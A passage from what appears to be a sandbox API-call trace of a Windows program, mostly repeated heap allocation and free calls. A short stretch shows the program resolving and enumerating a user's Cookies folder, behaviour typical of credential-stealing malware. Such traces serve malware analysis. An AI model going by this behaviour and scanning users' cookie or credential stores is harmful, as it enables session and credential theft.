dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0187.453] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05c18 | out: hHeap=0x2c0000) returned 1 [0187.453] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c18 [0187.453] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0187.454] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0187.454] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05c18 | out: hHeap=0x2c0000) returned 1 [0187.454] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c18 [0187.454] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0187.454] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0187.455] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05c18 | out: hHeap=0x2c0000) returned 1 [0187.455] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c18 [0187.455] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0187.455] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0187.456] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05c18 | out: hHeap=0x2c0000) returned 1 [0187.456] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c18 [0187.456] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0187.456] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0187.457] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05c18 | out: hHeap=0x2c0000) returned 1 [0187.457] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c18 [0187.457] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0187.457] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0187.457] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0187.458] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0187.458] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05c18 | out: hHeap=0x2c0000) returned 1 [0187.458] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c18 [0187.458] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0187.458] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0187.459] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05c18 | out: hHeap=0x2c0000) returned 1 [0187.459] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c18 [0187.459] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0187.459] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0187.460] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05c18 | out: hHeap=0x2c0000) returned 1 [0187.460] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c18 [0187.460] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0187.460] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0187.460] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05c18 | out: hHeap=0x2c0000) returned 1 [0187.460] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c18 [0187.460] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0187.461] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0187.463] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05c18 | out: hHeap=0x2c0000) returned 1 [0187.463] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c18 [0187.463] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0187.464] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0187.464] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05c18 | out: hHeap=0x2c0000) returned 1 [0187.464] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c18 [0187.464] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0187.465] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0187.465] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05c18 | out: hHeap=0x2c0000) returned 1 [0187.465] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c18 [0187.465] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Cookies\\") returned="Cookies\\" [0187.465] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a40 [0187.465] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0187.466] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05c18 | out: hHeap=0x2c0000) returned 1 [0187.466] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0187.466] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0187.466] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0187.466] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0187.466] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0187.466] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0187.466] PathFindFileNameW (pszPath="") returned="" [0187.494] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c18 [0187.494] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Cookies\\*" (normalized: "c:\\users\\keecfmwgj\\cookies\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e7f9530, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x19c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0xffffffff [0187.498] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05c18 | out: hHeap=0x2c0000) returned 1 [0187.499] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0187.499] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05c60 | out: hHeap=0x2c0000) returned 1 [0187.499] PeekMessageW (in: lpMsg=0x2f9ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9ff08) returned 0 [0187.499] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c60 [0187.499] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0187.499] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c18 [0187.499] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0187.500] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0187.500] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05c18 | out: hHeap=0x2c0000) returned 1 [0187.500] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c18 [0187.500] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0187.501] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0187.501] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05c18 | out: hHeap=0x2c0000) returned 1 [0187.501] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c18 [0187.501] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0187.502] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0187.502] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05c18 | out: hHeap=0x2c0000) returned 1 [0187.503] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c18 [0187.503] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0187.503] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0187.504] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05c18 | out: hHeap=0x2c0000) returned 1 [0187.504] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c18 [0187.504] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0187.504] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0187.504] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05c18 | out: hHeap=0x2c0000) returned 1 [0187.504] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c18 [0187.504] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0187.505] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0187.505] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05c18 | out: hHeap=0x2c0000) returned 1 [0187.505] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c18 [0187.505] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0187.505] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0187.506] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0187.506] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0187.507] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05c18 | out: hHeap=0x2c0000) returned 1 [0187.507] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c18 [0187.507] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0187.508] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0187.509] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05c18 | out: hHeap=0x2c0000) returned 1 [0187.509] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c18 [0187.509] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0187.509] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0187.509] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05c18 | out: hHeap=0x2c0000) returned 1 [0187.511] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c18 [0187.511] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0187.511] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0187.511] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05c18 | out: hHeap=0x2c0000) returned 1 [0187.511] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c18 [0187.511] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0187.512] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0187.512] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05c18 | out: hHeap=0x2c0000) returned 1 [0187.512] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c18 [0187.512] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0187.512] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0187.513] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05c18 | out: hHeap=0x2c0000) returned 1 [0187.513] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c18 [0187.513] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0187.513] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0187.513] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05c18 | out: hHeap=0x2c0000) returned 1 [0187.513] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c18 [0187.513] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0187.514] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0187.514] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05c18 | out: hHeap=0x2c0000) returned 1 [0187.514] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c18 [0187.514] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0187.514] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0187.515] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05c18 | out: hHeap=0x2c0000) returned 1 [0187.515] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c18 [0187.515] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0187.515] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0187.516] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05c18 | out: hHeap=0x2c0000) returned 1 [0187.516] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c18 [0187.516] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0187.516] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0187.516] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05c18 | out: hHeap=0x2c0000) returned 1 [0187.516] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c18 [0187.516] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0187.517] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0187.517] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05c18 | out: hHeap=0x2c0000) returned 1 [0187.517] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c18 [0187.517] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0187.517] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0187.518] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05c18 | out: hHeap=0x2c0000) returned 1 [0187.518] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c18 [0187.518] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0187.518] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0187.519] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05c18 | out: hHeap=0x2c0000) returned 1 [0187.519] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c18 [0187.519] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0187.519] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0187.520] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05c18 | out: hHeap=0x2c0000) returned 1 [0187.520] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c18 [0187.520] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0187.520] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0187.521] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05c18 | out: hHeap=0x2c0000) returned 1 [0187.521] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c18 [0187.521] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0187.521] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0187.521] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0187.522] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0187.522] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05c18 | out: hHeap=0x2c0000) returned 1 [0187.522] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c18 [0187.522] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0187.523] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0187.524] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05c18 | out: hHeap=0x2c0000) returned 1 [0187.524] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c18 [0187.524] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0187.524] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0187.524] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0187.525] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0187.525] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05c18 | out: hHeap=0x2c0000) returned 1 [0187.525] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c18 [0187.525] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0187.526] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0187.526] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05c18 | out: hHeap=0x2c0000) returned 1 [0187.526] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c18 [0187.526] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0187.526] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0187.527] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05c18 | out: hHeap=0x2c0000) returned 1 [0187.527] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c18 [0187.527] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0187.527] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0187.528] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05c18 | out: hHeap=0x2c0000) returned 1 [0187.528] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c18 [0187.528] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0187.529] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0187.529] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05c18 | out: hHeap=0x2c0000) returned 1 [0187.529] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c18 [0187.529] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0187.529] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0187.529] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0187.530] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0187.530] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05c18 | out: hHeap=0x2c0000) returned 1 [0187.530] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c18 [0187.530] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0187.531] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0187.531] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05c18 | out: hHeap=0x2c0000) returned 1 [0187.531] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c18 [0187.531] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0187.532] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0187.532] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05c18 | out: hHeap=0x2c0000) returned 1 [0187.532] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c18 [0187.532] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0187.533] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0187.533] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05c18 | out: hHeap=0x2c0000) returned 1 [0187.533] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c18 [0187.533] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0187.534] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0187.534] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05c18 | out: hHeap=0x2c0000) returned 1 [0187.534] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c18 [0187.534] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0187.535] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0187.535] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05c18 | out: hHeap=0x2c0000) returned 1 [0187.535] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c18 [0187.536] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0187.536] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0187.536] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05c18 | out: hHeap=0x2c0000) returned 1 [0187.537] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c18 [0187.537] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0187.537] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0187.538] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05c18 | out: hHeap=0x2c0000) returned 1 [0187.538] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c18 [0187.538] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0187.538] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0187.539] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05c18 | out: hHeap=0x2c0000) returned 1 [0187.539] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c18 [0187.539] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0187.539] HeapFree (in: hHeap=0x2c0000, 